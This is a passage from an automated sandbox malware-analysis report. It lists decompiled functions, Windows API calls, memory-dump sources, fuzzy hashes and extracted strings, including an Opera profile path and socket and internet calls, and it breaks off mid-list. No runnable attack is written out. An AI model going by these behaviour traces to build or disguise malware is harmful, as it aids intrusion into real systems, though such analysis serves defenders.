				while(_t1 != 0 && IsWindow(_t1) != 0) {
					Sleep(0x3e8);
					_t10 = _t10 + 1;
					if(_t10 < 0xa) {
						_t1 =  *0x7098f3c8; // 0xc003a
						continue;
					}
					break;
				}
				ExitProcess(0);
			}






                                                                                                        0x70982e50
                                                                                                        0x70982e60
                                                                                                        0x70982e63
                                                                                                        0x70982e67
                                                                                                        0x70982e6c
                                                                                                        0x70982e75
                                                                                                        0x70982e7b
                                                                                                        0x70982e7b
                                                                                                        0x70982e6c
                                                                                                        0x70982e86
                                                                                                        0x70982e95
                                                                                                        0x70982ea5
                                                                                                        0x70982ea7
                                                                                                        0x70982eab
                                                                                                        0x70982e90
                                                                                                        0x00000000
                                                                                                        0x70982e90
                                                                                                        0x00000000
                                                                                                        0x70982eab
                                                                                                        0x70982eaf

                                                                                                        APIs
                                                                                                        • IsWindow.USER32(000C003A), ref: 70982E63
                                                                                                        • PostMessageW.USER32(000C003A,00000010,00000000,00000000), ref: 70982E75
                                                                                                        • IsWindow.USER32(000C003A), ref: 70982E9A
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 70982EA5
                                                                                                        • ExitProcess.KERNEL32 ref: 70982EAF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$ExitMessagePostProcessSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 1225241566-0
                                                                                                        • Opcode ID: 90f2084c0f6d48411c537dd1abe8c0d74b46bad15cbdbaa07845a613108e1235
                                                                                                        • Instruction ID: 514dbad6e4f2456c1bdd874e137dcbec0919942aa0521c43f28c37973709007c
                                                                                                        • Opcode Fuzzy Hash: 90f2084c0f6d48411c537dd1abe8c0d74b46bad15cbdbaa07845a613108e1235
                                                                                                        • Instruction Fuzzy Hash: B2F0547265830197D31097E6CC85F4B33AC9708B40F201426F546E73D1D674E8019629
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709823D0, Relevance: 7.5, APIs: 5, Instructions: 34sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709823D0(intOrPtr* _a4) {
				intOrPtr* _t15;

				Sleep(0xbb8);
				_t15 = _a4;
				if( *_t15 == 0 &&  *(_t15 + 0x38) != 0) {
					do {
						Sleep(0x7d0);
					} while (GetFileAttributesW( *(_t15 + 0x38)) != 0xffffffff);
					E70981C90(_t15);
					VirtualFree( *(_t15 + 0x24), 0, 0x8000);
					 *(_t15 + 0x24) = 0;
					ExitProcess(0);
				}
				return 0;
			}




                                                                                                        0x709823dd
                                                                                                        0x709823df
                                                                                                        0x709823e6
                                                                                                        0x709823f5
                                                                                                        0x709823fa
                                                                                                        0x70982402
                                                                                                        0x70982408
                                                                                                        0x7098241b
                                                                                                        0x70982423
                                                                                                        0x7098242a
                                                                                                        0x7098242a
                                                                                                        0x70982435

                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 709823DD
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 709823FA
                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 70982400
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 7098241B
                                                                                                        • ExitProcess.KERNEL32 ref: 7098242A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$AttributesExitFileFreeProcessVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4254501734-0
                                                                                                        • Opcode ID: 758526328b954320d211fd7106953c1cbe67de541b16354130e4d4eb6da26835
                                                                                                        • Instruction ID: 527c73f094dbf9770f6b3bf43e0c08fa3cac4445a31c106ca42b099e69c85822
                                                                                                        • Opcode Fuzzy Hash: 758526328b954320d211fd7106953c1cbe67de541b16354130e4d4eb6da26835
                                                                                                        • Instruction Fuzzy Hash: B1F090721483109BD3109B66DC88B8AB3ECAF44724F200919E246926E0C7B4B440CB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E6B7B, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 299COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E6B82
                                                                                                          • Part of subcall function 004E69B9: __EH_prolog3.LIBCMT ref: 004E69C0
                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,00506D6D,?,?,PingThread,00000000,00000068), ref: 004A1804
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                          • Part of subcall function 004E7898: __EH_prolog3.LIBCMT ref: 004E789F
                                                                                                          • Part of subcall function 004E6666: __EH_prolog3.LIBCMT ref: 004E666D
                                                                                                          • Part of subcall function 004E4AAC: __EH_prolog3.LIBCMT ref: 004E4AB3
                                                                                                          • Part of subcall function 004E4947: __EH_prolog3.LIBCMT ref: 004E494E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalInitializeSection
                                                                                                        • String ID: 127.0.0.1$GWM.CreateClientSession.NoTV$abgehende Verbindung zum internen TV
                                                                                                        • API String ID: 1185523453-4222465694
                                                                                                        • Opcode ID: e68e6c1235f23db7ae6c26567acf5656c3999c497b88ff660bc309f258ff0f24
                                                                                                        • Instruction ID: 3c3d561ff2f9059716d7455960b207cfb48b07e84143a77ce54bf4f6a5edfbaa
                                                                                                        • Opcode Fuzzy Hash: e68e6c1235f23db7ae6c26567acf5656c3999c497b88ff660bc309f258ff0f24
                                                                                                        • Instruction Fuzzy Hash: A0C17570D0428DEFDF05EBE5C955AEEBBB5AF19308F10405EE04177282DB786A08DB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E8E28, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 232COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E8E2F
                                                                                                          • Part of subcall function 004EA1CF: __EH_prolog3.LIBCMT ref: 004EA1D6
                                                                                                          • Part of subcall function 0050F1EC: __EH_prolog3.LIBCMT ref: 0050F1F3
                                                                                                          • Part of subcall function 004E8E07: __EH_prolog3.LIBCMT ref: 004E8E0E
                                                                                                          • Part of subcall function 0044D2D4: __EH_prolog3.LIBCMT ref: 0044D2DB
                                                                                                          • Part of subcall function 00504380: _strncpy.LIBCMT ref: 0050438B
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004E7351: __EH_prolog3.LIBCMT ref: 004E7358
                                                                                                          • Part of subcall function 004B878E: __EH_prolog3.LIBCMT ref: 004B8798
                                                                                                        • _memset.LIBCMT ref: 004E9179
                                                                                                        • _memset.LIBCMT ref: 004E918B
                                                                                                          • Part of subcall function 004FAC95: __EH_prolog3_GS.LIBCMT ref: 004FAC9C
                                                                                                          • Part of subcall function 004FAC95: WSACreateEvent.WS2_32 ref: 004FADDF
                                                                                                          • Part of subcall function 004FAC95: GetTickCount.KERNEL32 ref: 004FAE21
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$_memset$CountCreateCriticalEventH_prolog3_InitializeSectionTick_strncpy
                                                                                                        • String ID: Default
                                                                                                        • API String ID: 3898518886-753088835
                                                                                                        • Opcode ID: 4f6df033102797e14fc18e6b6dd5b688120913be64b07e25cfc183452780eb2c
                                                                                                        • Instruction ID: afab304da9c528f98f02ee9eb0936b0b0463e6b67fb5468f43ddca70da577b57
                                                                                                        • Opcode Fuzzy Hash: 4f6df033102797e14fc18e6b6dd5b688120913be64b07e25cfc183452780eb2c
                                                                                                        • Instruction Fuzzy Hash: 2DC16AB0805784CED711DF7AC588BCAFFE0BF15304F9484AED09A97292CB746A08DB16
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00503AC5, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00503AD3
                                                                                                        • _malloc.LIBCMT ref: 00503AFA
                                                                                                          • Part of subcall function 00537172: __FF_MSGBANNER.LIBCMT ref: 00537195
                                                                                                          • Part of subcall function 00537172: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00540F49,?,00000001,?,00544586,00000018,007D5C28,0000000C,00544615,?), ref: 005371EA
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 004A1C93: __EH_prolog3.LIBCMT ref: 004A1C9A
                                                                                                          • Part of subcall function 004A1C93: EnterCriticalSection.KERNEL32(?,00000004,004A3359,00000008,004B9859,?,?,?,?,?,?,?,?,?,?,00000068), ref: 004A1CA8
                                                                                                          • Part of subcall function 004A1C93: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000068), ref: 004A1CC9
                                                                                                          • Part of subcall function 0050390E: __EH_prolog3.LIBCMT ref: 00503915
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$H_prolog3$EnterInitializeLeave$AllocateDeleteH_prolog3_catchHeap_malloc
                                                                                                        • String ID: HTTP server=$\Opera\Opera\profile\opera6.ini
                                                                                                        • API String ID: 3512885741-1944140675
                                                                                                        • Opcode ID: 4da57c51cf55d0ba5abd52e07687994ba16ce64769150fd18be173d039bc9e1a
                                                                                                        • Instruction ID: f7efd1ae7d344062b201b71234a66cc9379c0d9aa8ce31e5eb433115c93659b8
                                                                                                        • Opcode Fuzzy Hash: 4da57c51cf55d0ba5abd52e07687994ba16ce64769150fd18be173d039bc9e1a
                                                                                                        • Instruction Fuzzy Hash: 1281C13080418CDADF15EBA4C952BDD7B74AF22308F14419EF806A71E2DB74AF49CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E019F, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E01AA
                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,004E3FC0,00000000,00000000,?,?,00000338,?,?,?,?,?,?,Default), ref: 004A18C0
                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteH_prolog3__swprintf
                                                                                                        • String ID: Reason$RouterID$SetState
                                                                                                        • API String ID: 2349881506-2759572203
                                                                                                        • Opcode ID: 655e1eda90fc6bdc9fe1f8a48f413ebcaee86ad8e9ecc4ef5eb812baa93ed38d
                                                                                                        • Instruction ID: 8800d0e28e9348c939cb44fead5162335e8717b1e02977930c0735c4cfa60360
                                                                                                        • Opcode Fuzzy Hash: 655e1eda90fc6bdc9fe1f8a48f413ebcaee86ad8e9ecc4ef5eb812baa93ed38d
                                                                                                        • Instruction Fuzzy Hash: D371927540418CEEDF01EFA4C992ADD7BB8AF21308F14819EF44667192EB786F09C765
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0050284D, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00502857
                                                                                                        • inet_ntoa.WS2_32(?), ref: 00502883
                                                                                                          • Part of subcall function 004E6B7B: __EH_prolog3.LIBCMT ref: 004E6B82
                                                                                                          • Part of subcall function 00504380: _strncpy.LIBCMT ref: 0050438B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3H_prolog3__strncpyinet_ntoa
                                                                                                        • String ID: #$Abgehend nach UDP
                                                                                                        • API String ID: 3198417727-4203961990
                                                                                                        • Opcode ID: f66555cc22674665a44d17306b930ca831fa824d5126d6587d9c6305483be9bc
                                                                                                        • Instruction ID: acb5f4cf4234d5cc500a320945d00df3f3d202aa659205eb6c641fcffbb41d1a
                                                                                                        • Opcode Fuzzy Hash: f66555cc22674665a44d17306b930ca831fa824d5126d6587d9c6305483be9bc
                                                                                                        • Instruction Fuzzy Hash: AD51A3B0D00248AFDB10EBE5CD5ABEEBBB8BF55304F14405DE1456B181DBB46E48CB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004FF1E5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004FF1EC
                                                                                                        • inet_ntoa.WS2_32(?), ref: 004FF20D
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004FF29E
                                                                                                          • Part of subcall function 004B9004: shutdown.WS2_32(000000FF,00000001), ref: 004B901A
                                                                                                          • Part of subcall function 004B9004: closesocket.WS2_32(000000FF), ref: 004B9026
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseH_prolog3HandleInternetclosesocketinet_ntoashutdown
                                                                                                        • String ID: Tz
                                                                                                        • API String ID: 1444621331-4125522965
                                                                                                        • Opcode ID: 939497352b545ac74fc53c55b31112eff20ef16ce923f6fce055b9681a6216c5
                                                                                                        • Instruction ID: 33f1e450042c15d8d9c9b3706301f03ff0524d2692af621af367180bc154b9b2
                                                                                                        • Opcode Fuzzy Hash: 939497352b545ac74fc53c55b31112eff20ef16ce923f6fce055b9681a6216c5
                                                                                                        • Instruction Fuzzy Hash: 0B51C471D002099BDF15EFA1C896BEE77B4AF00314F14017EEA116B1D2DB785B49C7A9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0050331C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00503323
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                        • GetLastError.KERNEL32 ref: 0050342B
                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0050344E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
